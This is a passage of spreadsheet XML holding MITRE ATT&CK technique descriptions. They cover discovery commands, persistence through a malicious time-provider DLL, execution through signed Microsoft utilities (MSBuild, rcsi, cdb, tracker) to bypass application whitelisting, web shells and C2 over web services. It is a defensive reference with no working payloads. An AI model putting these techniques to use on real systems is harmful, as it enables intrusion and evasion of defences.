        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dir</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> within </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for identifying information based on present files and directories.</t>
    </r>
  </si>
  <si>
    <r>
      <t>On Mac, the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>systemsetup</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>system_profiler</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</t>
    </r>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <r>
      <t>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Arp</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ifconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>nbtstat</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>route</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</t>
  </si>
  <si>
    <r>
      <t>Utilities and commands that acquire this information include </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>netstat</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, "net use," and "net session" with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>In Mac and Linux, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>netstat</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>lsof</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can be used to list current connections. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>who -a</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can be used to show which users are currently logged in, similar to "net session".</t>
    </r>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <r>
      <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Dumping</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The information may be collected in a number of different ways using other </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Discovery</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.</t>
    </r>
  </si>
  <si>
    <r>
      <t>On Mac, the currently logged in user can be identified with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>users</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>who</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>On Linux, the currently logged in user can be identified with </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>who</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <r>
      <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Tasklist</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and "net start" using </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, but adversaries may also use other tools as well.</t>
    </r>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <r>
      <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>324325</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Net</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> on Windows by performing </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net time \\hostname</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>w32tm /tz</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>325</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The information could be useful for performing other techniques, such as executing a file with a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scheduled Task</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>326</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, or to discover locality information based on time zone to assist in victim targeting.</t>
    </r>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Shortcut Modification</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> of directory .LNK files that use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Masquerading</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to look like the real directories, which are hidden through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Hidden Files and Directories</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>327</t>
    </r>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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T1209</t>
  </si>
  <si>
    <r>
      <t>The Windows Time service (W32Time) enables time synchronization across and within domains.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>328</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>329</t>
    </r>
  </si>
  <si>
    <r>
      <t>Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>329</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>329</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may abuse this architecture to establish </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>330</t>
    </r>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Masquerading</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to hide malware and tools.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>331</t>
    </r>
  </si>
  <si>
    <t>T1127</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</si>
  <si>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t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.332</t>
  </si>
  <si>
    <r>
      <t>Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>333</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>174</t>
    </r>
  </si>
  <si>
    <t>DNX</t>
  </si>
  <si>
    <t>The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.334 DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft.</t>
  </si>
  <si>
    <t>An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.335</t>
  </si>
  <si>
    <t>RCSI</t>
  </si>
  <si>
    <r>
      <t>The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>336</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The rcsi.exe binary is signed by Microsoft.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>337</t>
    </r>
  </si>
  <si>
    <t>C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.337</t>
  </si>
  <si>
    <t>WinDbg/CDB</t>
  </si>
  <si>
    <t>WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.338 They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.</t>
  </si>
  <si>
    <t>An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.339</t>
  </si>
  <si>
    <t>It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.</t>
  </si>
  <si>
    <t>Tracker</t>
  </si>
  <si>
    <t>The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system.340</t>
  </si>
  <si>
    <t>An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.341</t>
  </si>
  <si>
    <t>T1199</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</si>
  <si>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 used by the other party for access to internal network systems may be compromised and used.</t>
  </si>
  <si>
    <t>T1111</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</si>
  <si>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t>
  </si>
  <si>
    <t>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token.342</t>
  </si>
  <si>
    <t>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actors.169</t>
  </si>
  <si>
    <t>Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials.</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <r>
      <t>An adversary may rely upon specific actions by a user in order to gain execution. This may be direct code execution, such as when a user opens a malicious executable delivered via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Attachment</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>with the icon and apparent extension of a document file. It also may lead to other execution techniques, such as when a user clicks on a link delivered via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Link</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> that leads to exploitation of a browser or application vulnerability via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exploitation for Client Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. While User Execution frequently occurs shortly after </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Initial Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it.</t>
    </r>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <r>
      <t>Adversaries may steal the credentials of a specific user or service account using </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Initial Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.</t>
  </si>
  <si>
    <t>The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.343</t>
  </si>
  <si>
    <t>T1125</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</si>
  <si>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</si>
  <si>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</si>
  <si>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In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. 344</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.</t>
  </si>
  <si>
    <t>These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>345</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Web shells may serve as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Redundant Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
    </r>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <r>
      <t>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>C$</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ADMIN$</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>IPC$</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may use this technique in conjunction with administrator-level </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Valid Accounts</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to remotely access a networked system over server message block (SMB)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>346</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to interact with systems using remote procedure calls (RPCs),</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>347</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> transfer files, and run transferred binaries through remote </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Example execution techniques that rely on authenticated sessions over SMB/RPC are </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scheduled Task</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Service Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
